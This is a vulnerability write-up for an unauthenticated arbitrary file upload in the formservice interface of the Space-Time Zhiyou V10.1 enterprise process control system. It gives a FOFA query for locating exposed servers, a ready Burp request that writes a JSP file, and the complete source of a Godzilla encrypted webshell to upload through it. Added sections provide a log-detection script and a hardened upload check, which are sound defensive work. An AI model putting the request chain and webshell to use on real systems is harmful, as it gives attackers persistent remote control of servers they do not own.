Arbitrary file upload vulnerability in the Space-Time Zhiyou Enterprise Process Control System
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
The Space-Time Zhiyou Enterprise Process Control System is a feature-rich, flexible and customizable enterprise management tool. Through it, enterprises can automate processes, improve collaboration, gain insight from data and optimize decision-making, thereby improving work efficiency, management quality and competitiveness.
2. Vulnerability overview
The formservice interface of the Space-Time Zhiyou Enterprise Process Control System has an arbitrary file upload vulnerability. Unauthenticated attackers can upload backdoor files through this interface, which can ultimately lead to the server being compromised.
3. Affected versions
Space-Time Zhiyou V10.1
4. Reproduction environment
FOFA query: app="Spacetime Smart Friends V10.1"
5. Vulnerability reproduction
Burp PoC
POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
content
Burp screenshot
Verify that the URL echoes the content you entered.
The echoed file name can then be accessed under http://ip/form/temp/
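The two requests above leave a recognisable trace in the web server's access log: a POST to /formservice with service=attachment.write and a server-side script extension in filename, followed by a request for that file under /form/temp/. The following detection script is an added example, not part of the original write-up or the vendor's product; it assumes Apache/Nginx "combined" log format, and the sample log lines are constructed to mirror the request sequence shown above.

```python
"""Added example: flag attachment.write uploads and webshell fetches in access logs.

Not part of the original write-up. The log format (Apache/Nginx "combined") and
the sample lines are constructed; the /formservice and /form/temp/ paths are the
ones named in the advisory.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Extensions a servlet container will execute if the file lands under the webroot.
EXECUTABLE_EXTENSIONS = (".jsp", ".jspx", ".jspf", ".jsw", ".jsv")

# Combined log format: client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def _is_executable(name: str) -> bool:
    return name.lower().endswith(EXECUTABLE_EXTENSIONS)


def classify_request(method: str, target: str):
    """Return (severity, reason) for one request line, or None if uninteresting."""
    parts = urlsplit(target)
    if parts.path == "/formservice":
        query = parse_qs(parts.query)
        if query.get("service", [""])[0] != "attachment.write":
            return None
        filename = query.get("filename", [""])[0]
        if _is_executable(filename):
            return ("high", f"executable file written via attachment.write: {filename}")
        # Legitimate uploads also land here; keep them at low severity for baselining.
        return ("low", f"attachment.write call for {filename!r}")
    if parts.path.startswith("/form/temp/") and _is_executable(parts.path):
        # A request for a server-side script in the upload directory: a dropped file being used.
        return ("high", f"request for executable file in upload directory: {parts.path}")
    return None


def scan_log(lines):
    """Parse access-log lines and return findings in order of appearance."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        hit = classify_request(match.group("method"), match.group("target"))
        if hit is not None:
            severity, reason = hit
            findings.append({
                "client": match.group("client"),
                "time": match.group("time"),
                "status": match.group("status"),
                "severity": severity,
                "reason": reason,
            })
    return findings


# Constructed sample log lines, modelled on the request sequence in the advisory.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /form/temp/a.jsp HTTP/1.1" 200 345 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:14:01:02 +0000] "POST /formservice?service=attachment.write&isattach=true&filename=report.pdf HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:14:05:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f'[{finding["severity"]}] {finding["client"]} {finding["time"]} -> {finding["reason"]}')
```

The low-severity hits are deliberate: on a live system attachment.write is also the legitimate upload path, so a baseline of normal callers and file types is what lets the high-severity hits stand out, and a status 200 on the /form/temp/ request confirms the dropped file was actually served.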
Upload a Godzilla webshell
POST /formservice?service=attachment.write&isattach=false&filename=a.jsp HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{
public X(ClassLoader z){
super(z);}public Class Q(byte[] cb){
return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){
try{
javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){
return null; }} public static String md5(String s) {
String ret = null;try {
java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {
}return ret; } public static String base64Encode(byte[] bs) throws Exception {
Class base64;String value = null;try {
base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] {
byte[].class }).invoke(Encoder, new Object[] {
bs });} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] {
byte[].class }).invoke(Encoder, new Object[] {
bs });} catch (Exception e2) {
}}return value; } public static byte[] base64Decode(String bs) throws Exception {
Class base64;byte[] value = null;try {
base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] {
String.class }).invoke(decoder, new Object[] {
bs });} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {
String.class }).invoke(decoder, new Object[] {
bs });} catch (Exception e2) {
}}return value; }%><%try{
byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){
session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{
request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){
}
%>
Burp screenshot
Xiaolong PoC detection script
Test connection
Connection succeeds
View the sent data in Burp
Success
6. Remediation
Add strong authentication to the interface's access control.
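Authentication closes the hole the advisory reports, but an upload endpoint that lets the caller name a .jsp file under a served directory remains one authenticated account away from the same outcome. The following gate is an added example of the checks a hardened attachment-write handler should make; it is not the vendor's code. It assumes the handler can see the caller's session and that UPLOAD_ROOT is a directory the servlet container neither serves nor executes.

```python
"""Added example: server-side gate for an attachment-write endpoint.

Not the vendor's code. Assumes the handler can see the caller's session and
that UPLOAD_ROOT is a directory the servlet container does not serve or execute.
"""
import posixpath
import re
import uuid

# Only the data formats the application actually needs; never server-side script types.
ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".jpeg", ".docx", ".xlsx"}

# One plain name segment: no separators, no control characters, bounded length.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.\-]{0,99}$")

UPLOAD_ROOT = "/var/lib/app/attachments"  # assumption: outside the webroot


class UploadRejected(Exception):
    """Raised with a short, log-friendly reason when a request must not write a file."""


def storage_name_for(session: dict, filename: str, name_source=lambda: uuid.uuid4().hex) -> str:
    """Validate an attachment.write request and return the server-chosen storage path.

    The client-supplied name is used only to derive the extension; the stored
    name is random, so the caller can neither pick a path nor predict the URL.
    """
    # 1. The advisory's root cause: the interface accepted unauthenticated callers.
    if not session.get("user_id"):
        raise UploadRejected("authentication required")

    # 2. Reject anything that is not a single plain file name (traversal, NUL, backslashes).
    if "\x00" in filename or "\\" in filename:
        raise UploadRejected("invalid file name")
    if posixpath.basename(filename) != filename or not SAFE_NAME.match(filename):
        raise UploadRejected("invalid file name")

    # 3. Allow-list the extension; .jsp and its variants are never in the list.
    ext = posixpath.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")

    # 4. Server-chosen name under a directory the container neither serves nor executes.
    return posixpath.join(UPLOAD_ROOT, f"{name_source()}{ext}")


if __name__ == "__main__":
    for name in ["report.pdf", "a.jsp", "../report.pdf", "report"]:
        try:
            print(name, "->", storage_name_for({"user_id": 42}, name))
        except UploadRejected as why:
            print(name, "-> rejected:", why)
```

Each check is independent, so the handler still refuses a .jsp if the session check is later bypassed, and still refuses a traversal name if the extension list is later widened; the random storage name is what removes the attacker's ability to reach the file at a known URL even when the other checks fail.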